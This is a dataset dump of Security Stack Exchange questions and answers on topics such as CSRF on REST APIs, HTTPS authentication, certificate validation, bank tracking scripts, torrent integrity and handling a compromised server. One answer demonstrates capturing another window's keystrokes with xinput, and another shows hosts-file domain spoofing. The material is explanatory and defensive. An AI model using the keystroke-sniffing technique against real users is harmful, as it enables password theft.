source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
166,146
Say, I have scanned our Cisco Router, and it returned 20 vulnerabilities back. However, most of them are tied to specific services that this router is not running, for example CVE-2016-6380 - we are not running dns server on our cisco thus we are not vulnerable to it. On one hand, I should exclude this vulnerability from the report - we are not ACTUALLY vulnerable, and all this white noise quickly adds up and the report becomes useless, because nobody reads it. On the other hand, what if one day we decide to turn dns or other service on? We won't know we are vulnerable because it is no longer in scope. So I wonder whether you can point me in the right direction here. I'm currently skimming through NIST 800-115, but can't find the answer yet. Does NIST say anything about it at all? TLDR Should a vulnerability in a service that is present on the device, but not running and not used at all, be mentioned in the vulnerability report?
It depends on how your organization uses these kind of reports. If the people responsible for planning and/or implementing security controls read these documents once and then never look at them again OR see them more as a guideline than actual rules on how to set up an environment, I can see that you might want to refrain from adding too much information into the report. Just because you want to make sure that the vulnerabilites that are acutally present are met with saftey measures. On the other hand if these are "living" documents that set rules on how controls have to be planned and implemented AND the people who are responsible update these documents if the infrastructure changes at a certain point, you definitely want to include these vulnerabilites. IMHO as someone who organizes information security in an institution this is the kind of culture you should push for. If you are afraid that your document will become too cluttered, you can always work with its structure. Something that was done in an organization I worked with, was, that vulnerabilites like this or possible future vulnerabilities were added in an annex to the main document. If the infrastructure was changed in any way, admins could check the annex first, if any of the changes would bring in the vulnerabilities listed there. One last point I would like to make: although YOU didn't enable those features, this doesn't mean an attacker won't do it after he/she got access to the router. So implementing security measures just in case can be reasonable. This might be something that should be evaluated in a risk analysis though. To quote ISO/IEC 27005: The presence of a vulnerability does not cause harm in itself, as there needs to be a threat present to exploit it. A vulnerability that has no corresponding threat may not require the implementation of a control, but should be recognized and monitored for changes.
{ "source": [ "https://security.stackexchange.com/questions/166146", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155377/" ] }
166,204
When we enter an URL in a browser, it uses HTTP by default but if the server only support HTTPS, does the traffic redirect to https automatically without the user noticing? Am I right? If wrong, please correct me.
No, at the moment no major browsers would redirect to HTTPS automatically. The website can set HSTS header to tell browsers that they should redirect to HTTPS automatically for future requests, or they can register themselves into HSTS preload list , and users can install browser plugins to always load HTTPS based on a white list or even to always try HTTPS first . All of these are opt-in, either the website or the user has to do something to make the browser do this. In its default configuration, without explicit action by the user or the web site, no major browsers would automatically use HTTPS.
{ "source": [ "https://security.stackexchange.com/questions/166204", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155439/" ] }
166,226
I bought the mobile phone myself, but my employer paid the mobile subscription. What data can they see and what are potential privacy risks? As far as I know they see which numbers I called (only traditional calls, not via VoIP apps), but they don't see individual Internet traffic. I also use the iPhone for the company Microsoft Exchange Server server.
They will most likely be able to see an itemised bill showing who you called and when. They will also be able to see mobile data usage. If the phone is enrolled in the organisations mobile management system, they may be able to monitor and control app usage as well as monitor and control internet traffic. UPDATE: In a worst case scenario they could potentially install full monitoring and install things like key loggers, this is very unlikely however. Additionally, depending on what part of the world you live in, there are restrictions on what they can legally collect, especially without consent. The best thing to do is ask your company what you can and can’t use the phone for. If it is a large organisation they should have a security policy and an acceptable use policy.
{ "source": [ "https://security.stackexchange.com/questions/166226", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16066/" ] }
166,340
Finland's largest bank OP (former Osuuspankki) has added tracking domains (all three owned by Adobe) in their website redesign: These domains are loaded when signed in : 2o7.net demdex.net omtrdc.net Is this considered acceptable? What information can third-party domains gather on my bank account activity?
It looks like the main site is embedding script from Adobe Marketing Cloud directly into the page. While these scripts are loaded from the same server as the main site it looks like that these scripts communicate with external servers using XHR and also download new script from demdex.net and 2o7.net according to the logs of uBlock Origin. Especially the loading and executing of new scripts from a third party outside the control of your bank is a huge security problem . Essentially these scripts can get full control over the web site, including reading what you enter, changing submitted or displayed content etc. These are essentially cross site scripting, only that they did not happen by accident but the developers of the banking site explicitly invited these third parties to do cross site scripting. While such use of third party services might be acceptable on a site where no sensitive information is entered, it is absolutely not acceptable whenever sensitive information is transferred or when it unexpectedly changes to the content of a web site (like showing a different account balance) and might cause unwanted actions from the visitor.
{ "source": [ "https://security.stackexchange.com/questions/166340", "https://security.stackexchange.com", "https://security.stackexchange.com/users/128225/" ] }
166,514
My husband got a pop-up ad on his phone for a fashion website and purchased two pairs of sunglasses using our debit card. The confirmation was emailed to me (marked as spam by gmail), and the site seemed very suspicious to me: the URL is nonsense, the confirmation message had a number of basic grammatical errors, and the deal seems too good to be true. It could potentially be completely legitimate, but I'm suspicious. What, if anything, should I do at this point to mitigate the fact that my husband just gave out our billing information to a potentially fraudulent website? We are in the USA. Billing confirmation message: [email protected] Jul 30 (2 days ago) to me Dear {{ [email protected] }}, Attention:This is a confirmation for your order detail. It means you have paid for the order successfully. Order details: Merchant Order No. : 628 Order No. : {{ order number }} Payment Date&Time : Mon Jul 31 03:01:01 CST 2017 Amount : 54.98 USD **Please do not reply to this email. Emails sent to this address will not be answered. **Due to floating exchange rate, tiny disparity of order value may exist. **Please note that your bank may apply a small charge for handling this transaction. Contact details: Email: [email protected] ☆ We an independent third party payment provider and as such protecting all cardholders is our primary concern. ☆If you have any problems about this transaction, please don’t hesitate to contact us. We’ll try our best to help you until you are satisfied with it. ☆Please ensure our email add added to your allowed list to ensure that we can help you properly.
The best course of action would be to contact your card provider and ask to block the transaction. Also, I recommend you block your credit card number and get a new replacement credit card. Here's why: The whois information for the website reveals that it is registered to someone in China with most likely a fake address: Domain Name: RBXZO.COM Registry Domain ID: 2137576384_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.publicdomainregistry.com Registrar URL: www.publicdomainregistry.com Updated Date: 2017-06-27T10:21:01Z Creation Date: 2017-06-27T10:21:00Z Registrar Registration Expiration Date: 2018-06-27T10:21:00Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrar IANA ID: 303 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Not Available From Registry Registrant Name: liu fuquan Registrant Organization: liu fuquan Registrant Street: guangdongsheng zhaoqingshidinghuqu Registrant City: BeiJin Registrant State/Province: BeiJin Registrant Postal Code: 526000 Registrant Country: CN Registrant Phone: +86.017082434147 Registrant Phone Ext: Registrant Fax: +86.017082434147 Registrant Fax Ext: Registrant Email: The registered email at qq.com also looks fake. The website itself asks to register an account and set password on a non-SSL (not properly secured / no encryption) HTTP page as seen below: I did not actually go through with the registration page and cannot see the payment page, but I doubt that they have HTTPS (SSL) encryption on there either. Overall, very shady and I highly recommend you block the transaction, the credit card and get a new credit card delivered to you. Addendum: As someone pointed out in comments, the password your husband created or used on the website should not be used elsewhere anymore. If your husband has that same password set elsewhere, we recommend changing it. Also, to clarify, you can try to cancel the transaction, but as others pointed out, you did initiate the transaction and so it's a valid transfer of money as far as your financial institution is concerned. So you will likely not recover the money your husband spent on the website. But you can block the card and ask for a new one to prevent misuse of your card in the future.
{ "source": [ "https://security.stackexchange.com/questions/166514", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99688/" ] }
166,684
The Let's Encrypt documentation recommends that when a certificate’s corresponding private key is no longer safe, you should revoke the certificate . But should you do the same if there are no indications that the key is compromised, but you no longer need the certificate? Let's Encrypt certificates will automatically expire after 90 days. Is it enough to delete the certificate and its private key? As a background, this is my concrete scenario: When we deploy new software, it will create new EC2 instances, which will eventually replace the existing instances (immutable server pattern). At startup, new instances will acquire a new Let's Encrypt certificate. Certificates (and their private keys) never leave the EC2 instance. So, when old instances are terminated, the certificates assigned to that machine will be destroyed. At this point, we are no longer able to get access to the private key. Questions: From my understanding, revoking might be a good practice. But strictly speaking, it will not increase the security of the system (of course, assuming that the private key was not compromised). Is that correct? Will it help the Let's Encrypt operators to explicitly revoke unused certificates, or will it do more harm? (I'm not sure, but revoking could trigger extra processes, which might be unnecessary if there is no indication of the key being compromised.)
This is a subjective Cost vs Risk decision. We can't make it for you, but I can help you examine the factors involved. Cost To you : the effort of revoking the cert. If you have to do this manually, that's annoying, but if you can script it up in 10 mins and add it to your CloudFormation plays, then why not? As @Hildred points out, this also advertises that your server has been decommissioned, which could be considered a privacy / security issue depending on how much you care. To LetsEncrypt : They need to handle the revocation request, which is not a particularly heavy request. Each revoked cert adds a line to their CRLs , slightly higher bandwidth costs to transmit the CRLs, and slight performance penalty to their OCSP responders that need to search the CRLs. But it's certainly not a burden since the system is literally designed for this. Risk If an attacker finds out that you terminate your VMs without revoking the cert, can they use that to their advantage? A rogue admin (either yours or amazon's) could pull the cert and key from the VM as it is being terminated and you'd be none the wiser. Is that likely or any bigger of a threat than pulling it from a live system? Probably not. So really, we're dealing with a very small cost vs a very small risk. Your choice. Thanks for asking the question though, neat to think about!
{ "source": [ "https://security.stackexchange.com/questions/166684", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18241/" ] }
166,724
Quick note: this is not a duplicate of CSRF protection with custom headers (and without validating token) despite some overlap. That post discusses how to perform CSRF protection on Rest endpoints without discussing if it is actually necessary. Indeed, many CSRF/Rest questions I've read on this site talk about securing the endpoints via CSRF tokens without actually discussing whether or not it is necessary. Hence this question. Is CSRF Protection necessary for Rest API endpoints? I've seen lots of discussion about securing REST endpoints against CSRF attacks, but having given the topic lots of thought, I'm very certain that CSRF tokens on a REST endpoint grant zero additional protection. As such, enabling CSRF protection on a REST endpoint just introduces some useless code to your application, and I think it should be skipped. I may be missing something though, hence this question. I think it will help to keep in mind why CSRF protection is necessary in the first place, and the attack vectors it protects against: Why CSRF? It really boils down to the browsers ability to automatically present login credentials for any request by sending along cookies. If a session id is stored in a cookie the browser will automatically send it along with all requests that go back to the original website. This means that an attacker doesn't actually have to know authentication details to take an action as the victim user. Rather, the attacker just has to trick the victims browser into making a request, and the credentials to authenticate the request will ride along for free. Enter a REST API Rest API endpoints have a very important difference from other requests: they are specifically stateless, and should never accept/use data from either a cookie or session. As a result, a REST API that sticks to the standard is automatically immune to such an attack. Even if a cookie was sent up by the browser, any credentials associated with the cookie would be completely ignored. Authentication of calls to a REST API are done in a completely different fashion. The most common solution is to have some sort of authentication key (an OAuth Token or the like) which is sent along in the header somewhere or possibly in the request body itself. Since authentication is application-specific, and since the browser itself doesn't know what the authentication token is, there is no way for a browser to automatically provide authentication credentials even if it is somehow tricked into visiting the API endpoint. As a result, a cookie-less REST endpoint is completely immune from CSRF attacks. Or am I missing something?
I wasn't originally aiming for a self-answer, but after more reading I've come up with what I believe to be a comprehensive answer that also explains why some might still be interested in CSRF protection on REST endpoints. No cookies = No CSRF It really is that simple. Browsers send cookies along with all requests. CSRF attacks depend upon this behavior. If you do not use cookies, and don't rely on cookies for authentication, then there is absolutely no room for CSRF attacks, and no reason to put in CSRF protection. If you have cookies, especially if you use them for authentication, then you need CSRF protection. If all you want to know is "Do I need CSRF protection for my API endpoint?" you can stop right here and leave with your answer. Otherwise, the devil is in the details. h/t to paj28: While cookies are the primary attack vector for CSRF attacks, you are also vulnerable if you use HTTP/Basic authentication. More generally, if the browser is able automatically pass along login credentials for your app, then CSRF matters. In my experience cookies are the most common technology being exploited to make CSRF happen, but there are some other authentication methods that are used which can result in the same vulnerability. REST = Stateless If you ask someone "what is REST" you will get variety of answers that discuss a variety of different properties. You can see as much because someone asked that question on stack overflow: https://stackoverflow.com/questions/671118/what-exactly-is-restful-programming One property of REST that I have always relied upon is that it is stateless. The application itself has state of course. If you can't store data in a database somewhere, your application is going to be pretty limited. In this case though, stateless has a very specific and important meaning: REST applications don't track state for the client-side application. If you are using sessions, then you are (almost certainly) keeping track of client-side state, and you are not a REST-full application. So an application that uses sessions (especially for logins) that are tracked via cookies is not a REST-full application (IMO), and is certainly vulnerable to CSRF attacks, even if it otherwise looks like a REST application. I think it is worth a quick note that one reason that client-side statelessness is important for REST applications is that the ability of intermediaries to cache responses is also a desirable part of the REST paradigm. As long as the application is tracking client-side state, caching is not possible. Rest ≠ Cookieless For these reasons, I initially assumed that a fully-compliant REST application would never need sessions, never need cookies, and therefore never need CSRF security. However, there is at least one use-case that may prefer cookies anyway: persistent logins. Consider a typical client-side (in this case browser, not mobile) web application. You get started by logging in, which uses a REST API to validate user credentials and in return is given a token to authorize future requests. For single page applications, you can just keep that token in memory, but doing so will effectively log the user out if they close the page. As a result, it would be good to persist the state somewhere that can last longer than a single browser session. Local storage is an option, but is also vulnerable to XSS attacks: a successful XSS attack can result in the attacker grabbing your login tokens and sending them off to the attacker to be used at their discretion. For this reason, I have seen some suggest using cookies to store login tokens. With a cookie you can set the http-only flag, which prevents the application from reading the cookie after it is set. As a result, in the event of an XSS attack, the attacker can still make calls on your behalf, but they can't walk away with the authorization token all together. This use of cookies doesn't directly violate the statelessness requirement of REST because the server still isn't tracking client-side state. It is just looking for authentication credentials in a cookie, rather than the header. I mention this because it is potentially a legitimate reason to use cookies with a REST API, although it is obviously up to a given application to balance the various security and usability concerns. I would personally try to avoid using cookies with REST APIs, but there may very well be reasons to use them anyway. Either way, the overall answer is simple: if you are using cookies (or other authentication methods that the browser can do automatically) then you need CSRF protection. If you aren't using cookies then you don't.
{ "source": [ "https://security.stackexchange.com/questions/166724", "https://security.stackexchange.com", "https://security.stackexchange.com/users/149676/" ] }
167,106
As title says, I was asked for my online banking password while on the process of getting in touch with a real person. This is something I'd never do and knowing that the call was being recorded (for further improvement of the bot I was talking to) makes it even worse. For sure, after that, I hung up and I'm pretty sure it is a violation of privacy as you are asked for private details and also it is not encrypted whatsoever. Have anyone been asked for this before? Is this a normal practice? After saying my ID number, the bot refered to me as "Mr. my_last_name " so I guess it is a legit phone number but, could they been hacked and the support number hijacked? Should I take any actions?
Assuming that you called them on a published number, I'd say that this sounds like it was an interactive Voice Response (IVR) system, which is pretty common in the banking world. The concept is that the system takes your authentication information before passing you on to a contact centre agent. The benefit of this from a security perspective is that then the agent in the call centre doesn't have to ask you to authenticate yourself, before discussing your account. If correctly implemented this should be no more insecure than typing your password into a website. There is an automated system processing the voice data and it should store/log this appropriately. Of course as you point out there is the risk of phone tapping, but then if you assume that your phone line is tapped, any form of phone banking is insecure as they've got to authenticate you somehow to be able to discuss your account with you. EDIT: To add some more details, rather than leave them scattered around comments that could get cleared. Basically banks have to authenticate you somehow, no matter which channel (e.g. web, phone, branch) you use to contact them, and there are trade-offs to be considered. On the one hand having dedicated credentials per channel is useful in that it reduce the risk of compromise, and avoids muddying the message of "don't tell people your web password" but it leaves users with more credentials to manage and in all likelihood a lot of password resets if users only use a specific channel rarely (with all the vulnerabilities that frequent resets attract) So the option that it appears, from the information provided, that's used here is to combine the credentials for the web and phone channels, and to use an automated IVR system on the phone channel to avoid credentials being given to contact centre agents. The upside here is single set of creds, so user's won't forget them, and the downside is the scenario we see where bank messaging "don't give people your password" leads to problems in using this system. In terms of the IVR system security, this is essentially like any other system that processes data. It needs to be secured appropriately so that user credentials are not exposed, no different than the web channel. Obviously a system like hardware (not SMS) 2FA could work well in this scenario as numeric codes are easily passed to IVR systems, but that has it's own tradeoffs in terms of cost and user experience.
{ "source": [ "https://security.stackexchange.com/questions/167106", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108682/" ] }
167,284
Why is the following database table not secure? Which encryption method is better for credit cards? +--------------+-------------------------------+-----------+--------------+ | customer_id | card_number | card_cvv | card_expiry | +--------------+-------------------------------+-----------+--------------+ | 2315 | ODU2OS0xMjU0LTc4NTQtMzI2NQ== | MjU4OQ== | May 2018 | +--------------+-------------------------------+-----------+--------------+
It's obviously base64 encoded. If someone steals your database, he can just decode the data and have all credit card from every customer. You could just store as string and have basically the same security, as you are only using more bytes to achieve the same. To store credit card data, you must be compliant with PCI rules. And PCI explicitly forbids storing the CVV. If your table have a field for CVV, you failed. If you encode it and store, you failed. Even if you encrypt it, you failed. CVV must never be stored in any means. As for the encryption method, first read PCI documentation . Building a secure credit card storage is a very difficult task and a very serious one, so don't attempt to do it without understanding the correct methods, risks and mitigations, or you will expose your clients to financial losses and yourself to litigation.
{ "source": [ "https://security.stackexchange.com/questions/167284", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156569/" ] }
167,412
Sometimes, Ubuntu shows the following window: This window can be caused by some background processes running, such as an automatic update, or a process which reports bugs to Canonical which manifests itself this way: Since those are background processes, the first window is not shown in response to an action I performed myself, in a situation where I was expecting the system to ask me for the password. This means that: From the perspective of the user, there is no guarantee that the prompt comes from the operating system; it could be any malicious program which had only a limited permission to show a window, and which, by prompting for my password, will gain unlimited access to the entire machine. By prompting the user for a password regularly, the system teaches the user that giving his system password whenever some application asks for it is a perfectly natural thing to do. My questions are: Is there any safety mechanism in Linux in general or Ubuntu specifically that prevents any application from displaying a dialog which looks identical to the system one, asking me for my password? How should such windows be designed to increase the safety of the user? Why not implement a system similar to Windows' Ctrl + Alt + Del on logon ?
Your points are all good, and you are correct, but before we get outraged about it we need to remind ourselves how the linux security model works and what it's designed to protect. Remember that the Linux security model is designed with a multi-user terminal-only or SSH server in mind. Windows is designed with an end-user workstation in mind (but I've heard that the recent generation of Windows is more terminal-friendly). In particular, Linux convention does a better job of sandboxing apps into users, while in Windows anything important runs as System, while the Linux GUI (X Server) sucks at security, and the Windows GUI has fancy things like UAC built-in. Basically, Linux is (and always has been) a server first and a workstation second, while Windows is the other way around. Security Models As far as "the OS" (ie the kernel) is concerned, you have 7 tty consoles and any number of SSH connections (aka "login sessions") - it just so happens that ubuntu ships with scripts to auto-start the GUI on the tty7 session, but to the kernel it's just another application. Login sessions and user accounts are sandboxed quite nicely from each other, but Linux takes a security mindset that you don't need to protect a user from them-self. In this security model, if your account gets compromised by malware then it's a lost cause, but we still want to isolate it from other accounts to protect the system as a whole. For example, Linux apps tend to create a low-privilege user like apache or ftp that they run as when not needing to do rooty things. If an attacker manages to take control of a running apache process, it can muck up other apache processes, but will have troubles jumping to ftp processes. Note that Windows takes a fundamentally different approach here, largely through the convention that all important things run as System all the time. A malicious service in Linux has less scope to do bad things than a malicious process running as System, so Windows needs to go to extra efforts to protect someone with admin rights from "them-self". GUI environments and an X Server that was not designed for security throw a wrench into this security model. Gnome gksudo vs Windows UAC, and keyloggers In Windows, when a user-process requests privilege escalation, the kernel throws up a special protected prompt whose memory and keyboard / mouse bus is isolated from the rest of the rest of the desktop environment. It can do this because the GUI is built-in to the OS. In Linux, the GUI (X server) is just another application, and therefore the password prompts belong to the process that invoked them, running as you, sharing memory permissions and an input bus with every other window and process running as you. The root prompt can't do the fancy UAC things Iike lock the keyboard because those either need to be root already, or require totally re-designing the X server (see Wayland below). A catch-22 that in this case is a downside of separating the GUI from the kernel. But at least it's in keeping with the Linux security model. If we were to revise the security model to clamp down on this by adding sandboxing between password prompts and other processes running as the user in the same GUI session, we could have to re-write a great many things. At the least, the kernel would need to become GUI aware such that it is capable of creating prompts (not true today). The other go-to example is that all processes in a GUI session share a keyboard bus. Watch me write a keylogger and then press some keys in a different window : ➜ ~ xinput list ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ Logitech K400 Plus id=9 [slave pointer (2)] ⎜ ↳ ETPS/2 Elantech Touchpad id=13 [slave pointer (2)] ➜ ~ xinput test 9 key release 36 key press 44 hkey release 44 key press 40 ekey release 40 key press 33 lkey release 33 key press 33 lkey press 39 okey release 33 key release 39 key press 66 key press 31 Any process running as you can sniff the password in another process's prompt or terminal and then call sudo on itself (this follows directly from the "no need to protect you from you" mindset), so increasing the security of the password prompts is useless unless we fundamentally change the security model and do a massive re-write of all sorts of things. (it's worth noting that Gnome appears to at least sandbox the keyboard bus on the lock screen and new sessions through "Switch Users" as things typed there do not show up in my session's keyboard bus) Wayland Wayland is a new protocol that aims to replace X11. It locks down client applications so that they cannot steal information or affect anything outside of their window. The only way the clients can communicate with each other outside of exterior IPC is by going through the compositor which controls all of them. This doesn't fix the underlying problem however, and simply shifts the need for trust to the compositor. Virtualization and Containers If you work with cloud technologies, you're probably jumping up and down saying "Docker is the answer!!". Indeed, brownie points for you. While Docker itself is not really intended to enhance security (thanks @SvenSlootweg), it does point to using containerization and / or virtualization as a forward that's compatible with the current Linux architecture. Two notable linux distributions that are built with inter-process isolation in mind: Qubes OS that runs user-level apps inside multiple VMs separated into "security domains" such as work, banking, web browsing. Android that installs and runs each app as a separate low-privilege user, thus gaining process-level isolation and file-system isolation (each app is confined to its own home directory) between apps. Bottom Line: From the perspective of an end-user, it's not unreasonable to expect Linux to behave the same way as Windows, but this is one of those cases where you need to understand a bit about how the underlying system works and why it was designed that way. Simply changing the implementation of the password prompts will not accomplish anything so long as it is owned by a process owned by you. For Linux to get the same security behaviours as Windows in the context of a single-user GUI workstation would require significant re-design of the OS, so it's unlikely to happen, but things like Docker may provide a way forward in a more Linux-native way. In this case, the important difference is that Linux is designed at the low level to be a multi-user server and they make the decision not to protect a user from them-self, while Windows is designed to be a single-user workstation, so you do need to have inter-process protections within a login session. It's also relevant that in Windows the GUI is part of the OS, while in Linux the GUI is just another user-level application.
{ "source": [ "https://security.stackexchange.com/questions/167412", "https://security.stackexchange.com", "https://security.stackexchange.com/users/7684/" ] }
167,422
While downloading a file via a torrent, what will happen if some of the peers send me fake chunks? Also, can any of the peers send me a whole fake file? For example, if I download a .torrent file which should download a file with hash sum A, and a peer sends me a file with hash sum B, will the torrent client notice that and block it?
Yes, a client will notice and block. A torrent is divided into pieces, a piece is divided into chunks. Every piece has its SHA1 hash included in the .torrents metadata. If a peer send fake or corrupted chunks this will be detected when the whole piece has been received and the hash check fails. A peer that repeatedly sends bad data will be blocked, but there is some leeway because corruption may naturally occur sometimes in a data transfer. A good client has heuristics to find out exactly what peer(s) sent bad data by comparing the chunks sent in the piece that failed the hash check, with the chunks in the same piece when it has been re-downloaded and passed the hash check.
{ "source": [ "https://security.stackexchange.com/questions/167422", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
167,744
I had an idea to make a plugin for one of my email clients where my users will be able to upload & scan attachments using VirusTotal service, but then again I was worried about their privacy and security of uploading personal files which may have been exposed to someone. My question here is; how safe is it to upload personal files, could they get exposed to someone beside owner of VirusTotal ?
Paid subscribes to virustotal can download files uploaded by others. If you consider this still safe for your users depends on what you consider safe. See also their Privacy Policy which clearly says: Information we share When you submit a file to VirusTotal for scanning, we may store it and share it with the anti-malware and security industry ... Files, URLs, comments and any other content submitted to or shared within VirusTotal may also be included in premium private services offered by VirusTotal to the anti malware and ICT security industry Still, I think that your idea of offering a simpler access to a useful service directly from the mail client makes sense. I would though recommend that you add an easy to understand but not easy to ignore warning about the privacy implications before the user uploads a file. And it might be less invasive to first check if the hash already exists at VT before uploading a file (and not upload if hash is known to VT). Ideally you also make it easy for users to remove an accidentally shared file (thanks to @Mirsad for this suggestion in a comment).
{ "source": [ "https://security.stackexchange.com/questions/167744", "https://security.stackexchange.com", "https://security.stackexchange.com/users/46520/" ] }
167,883
I'm still learning how SSL/TSL works, so apologies if this question is very basic. I understand that the server offers the client its SSL certificate, which contains the signature of a CA. I also understand that the client will usually have a list of certificate authorities it trusts. But what if the SSL certificate is signed by a CA that the client is not aware of? How will the client validate the certificate then?
When the client is verifying a certificate, there are three possibilities: The certificate is signed by a CA that the client already trusts (and for which it knows the public key). In this case the client treats the certificate as valid. The certificate is signed by a CA about which the client has no knowledge at all. In this case the client treats the certificate as invalid (and the browser will likely display a warning message instead of loading the page). The certificate is signed by a CA that the client doesn't know, but which has a certificate that is signed by a CA that the client does know. (In this case the server must usually send both its own certificate, and the certificate of the CA - called the "intermediate CA" - that signed its certificate). Since the intermediate CA's certificate is signed by a CA that the client already trusts, it knows can trust it, and since the server's certificate is signed by the intermediate CA, the client knows it can trust it too. Note that CA certificates are "special" - just because you have a certificate signed by a trusted CA, that doesn't mean you can then sign other certificates and have clients trust them - unless your certificate is marked as being valid for signing other certificates.
{ "source": [ "https://security.stackexchange.com/questions/167883", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157252/" ] }
167,893
As above, we were planning to do the following: Access our HSM (Luna SA) Generate CSR Send CSR to 3rd Party CA Add critical key usage of Non Repudiation on 3rd Parties portal Send the now signed CSR (public key to our trading partner) which has the key usage Does it matter if I have not added the key usage attribute during the CSR generation on the HSM as I cannot find a way to add the key usage with the HSM client software? Regards
When the client is verifying a certificate, there are three possibilities: The certificate is signed by a CA that the client already trusts (and for which it knows the public key). In this case the client treats the certificate as valid. The certificate is signed by a CA about which the client has no knowledge at all. In this case the client treats the certificate as invalid (and the browser will likely display a warning message instead of loading the page). The certificate is signed by a CA that the client doesn't know, but which has a certificate that is signed by a CA that the client does know. (In this case the server must usually send both its own certificate, and the certificate of the CA - called the "intermediate CA" - that signed its certificate). Since the intermediate CA's certificate is signed by a CA that the client already trusts, it knows can trust it, and since the server's certificate is signed by the intermediate CA, the client knows it can trust it too. Note that CA certificates are "special" - just because you have a certificate signed by a trusted CA, that doesn't mean you can then sign other certificates and have clients trust them - unless your certificate is marked as being valid for signing other certificates.
{ "source": [ "https://security.stackexchange.com/questions/167893", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157258/" ] }
167,955
I don't know how to ask this because this is something new for me, I try telnet to my server and the output was like this: Trying <IP>... Connected to www.tjto6u0e.site. Escape character is '^]'. Then I tried netstat -a | grep www.tjto6u0e.site , found this: I am using ubuntu and it was compromised before, but I have scanned my server and delete all infected files, including changing my default ssh port (22) to another one, but this one, I don't understand what is this about, is this normal or something that I should worry about? I checked this IP 43.252.11.213 from netstat -an and redirected to a URL bulan.loket.co.id , I don't have any idea what is happening, is it meant that my site is copied to other domain?
is this normal [that the my server login reports a different domain] Of course not. I am using ubuntu and it was compromised before Well ... you shouldn't have continued using it. but I have scanned my server and delete all infected files Virus scanners on an already compromised machine are pretty useless. (Even more useless than at other times). including changing my default SSH port (22) to another one Does this matter? Does this matter if you're using telnet ? And why you are using telnet!? I checked this IP 43.252.11.213 ... and redirected ... You also should never have called this in a browser. is it meant that my site is copied to other domain? No. Well, maybe, but that's not the problem. Until proven otherwise, assume that someone else has full control over your server (including all content, but also all other things the computer can do). What you should do now: Try to find out how your server got compromised and fix that (the probability is low that you find the reason). Also change all passwords, get used to regular software updates, SSH keys, fail2ban and so on. Wipe your server clean and start again by installing an OS, all necessary software, and all configs you need/want.
{ "source": [ "https://security.stackexchange.com/questions/167955", "https://security.stackexchange.com", "https://security.stackexchange.com/users/157247/" ] }
168,055
Is it safe to split a private key file and put it in different locations? I mean can somebody actually do anything with only a part of a key?
Just splitting the file up will not have the desired effect (as A.Hersean explains in their answer ). I think what you're looking for is " Secret Sharing " algorithms, most notably Shamir's Secret Sharing algorithm (thanks @heinrich5991), where the secret is split up into N pieces and given to different people for safe-keeping. To reconstruct the secret, all N pieces (or in some variants, only k of the pieces) need to be brought together. The attacker gains no information unless they have all the pieces. Although used in many applications, I don't believe it is available in openssl or CAPI. There are many robust open source implementations -- see this question , but you'll need to do some homework to decide if you trust the implementation to not be back-doored. There is also the related concept of "Multi-party encryption"; where you encrypt the secret with multiple people's public keys, and then all of them need to participate in decrypting it. Here's a SO tread about it: Encryption and decryption involving 3 parties You can do a poor-man's version of this using only the RSA implementation you already have by chaining RSA encryption: RSA(key1, RSA(key2, RSA(key3, secret) ) ) If you want 3 people to encrypt, but only 2 of them need to be present to decrypt, then you can store 3 versions of the ciphertext: RSA(key1, RSA(key2, secret) ) RSA(key2, RSA(key3, secret) ) RSA(key1, RSA(key3, secret) )
{ "source": [ "https://security.stackexchange.com/questions/168055", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150059/" ] }
168,089
First of all I am a web developer and not a security expert. I have read lots of articles about the difference between HTTPS and HTTP , including this site. The basic idea I got from them is, when using HTTPS all things are encrypted on the client side and then sent to the server. (Please correct me if I am wrong) So even our network admin or other person in the network can't get anything. When I use my laptop at home (trusted network) , is there any advantage of using HTTPS over HTTP ?
TLS provides three things: Confidentiality: that nobody can see the traffic between you and facebook.com (including the guy at the next table at Starbucks, your ISP, some sketchy network equipment in the datacentre COUGH NSA , nobody). Integrity: that nobody is modifying the messages as they travel between you and facebook.com (this is separate from Confidentiality because some kinds of attacks allow you to modify the message in a malicious way even if you don't know what the messages are). Authentication: that you are talking to the authentic facebook.com server, not a spoofed version of it. The basic idea what I got from them is, when using https all things are encrypted in client side and then sent it to the server. (Please correct me if I am wrong) That covers the confidentiality and integrity parts, but you're missing the authentication part: To prove that you're not talking to a spoofed web server. Say I set up a phishing version of Facebook and I somehow hack into your home router (easy) or ISP (harder) so that when you type facebook.com it resolves to my IP address instead of the real one. I've created an exact copy of the login screen you expect and you'll enter your username and password. Muahaha! Now I have your username and password. How does HTTPS prevent this? Answer: with Certificates: If we open up the certificate in my browser's Dev Tools > Security, we'll see this: DigiCert is what's called a Publicly-trusted Certificate Authority (CA) . In fact, DigiCert is one of the CAs that your browser inherently trusts because its "root certificate" is embedded into your browser's source code. You can see the full list of trusted root CAs by digging around in browser Settings and looking for "Certificates" or "Trusted Roots" or something. So, your browser inherently trusts DigiCert, and, through this certificate, DigiCert has certified that the server you are talking to is the real facebook.com (because it has the private key that matches the certificate). You get the green padlock and you know that everything is good. Just for fun, let's make a fake facebook.com . I added this line to my hosts file so that any time I type facebook.com it will redirect to google.com 's IP address: 209.85.147.138 facebook.com Google, what'cha doing trying to steal my facebook password?? Thank goodness HTTPS is here to protect me! My browser is super unhappy because the certificate it was presented (for google.com ) doesn't match the URL it requested ( facebook.com ). Thanks HTTPS!
{ "source": [ "https://security.stackexchange.com/questions/168089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/156934/" ] }
168,344
